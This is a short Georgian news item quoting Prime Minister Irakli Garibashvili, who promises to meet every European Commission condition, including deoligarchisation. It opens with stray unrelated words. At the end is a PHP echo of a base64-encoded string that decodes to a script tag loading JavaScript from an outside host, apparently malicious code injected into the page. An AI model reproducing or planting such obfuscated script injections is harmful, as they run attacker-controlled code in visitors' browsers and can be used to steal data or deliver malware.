celsiusi
ავერსი შნაიდერი

პრემიერმინისტრი, ირაკლი ღარიბაშვილი თქმით, ევროკომისიის მიერ წაყენებულ ყველა პირობას, მათ შორის დეოლიგარქიზაციასთან დაკავშირებით, ხელისუფლება "პირნათლად შეასრულებს". 

მისივე თქმით,  საქართველოში დეოლიგარქიზაცია "ნამდვილად არ არის გამოწვევა".

"მე როცა ვთქვი, რომ ჩვენს მიერ გასაკეთებელ ყველა პირობას პირნათლად შევასრულებთ, მე ამას ვგულისხმობ და სრული პასუხისმგებლობით ვაცხადებთ. საკითხი რომელიც ახსენეთ, დეოლიგარქიზაცია - ჩვენ რა თქმა უნდა, გვექნება კონსულტაციები ბრიუსელთან, უფრო მეტი კონკრეტიკის და განმარტების მისაღებად, თუ რა მოლოდინები არსებობს, როგორ უნდა განვახორციელოთ აღნიშნული კანონის მიღება. გვითხრეს, რომ უკრაინას აქვს ანალოგიური კანონი მიღებული, თუმცა აღინიშნა, რომ არ არის სრულყოფილი და ა.შ. ჩვენ ამ თემას ჩავუღრმავდებით. მოგეხსენებათ, აღნიშნული პირობა სამივე ქვეყანას განესაზღვრა და კარგად იცით, რომ ჩვენ ქვეყანაში ნამდვილად არ არის ეს გამოწვევა. მაგრამ, ამ პირობასაც ისეთივე პასუხისმგებლობით შევასრულებთ, როგორც სხვა დანარჩენს, პირველის გარდა [დეპოლარიზაცია]“, - თქვა ირაკლი ღარიბაშვილმა.

 

539
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");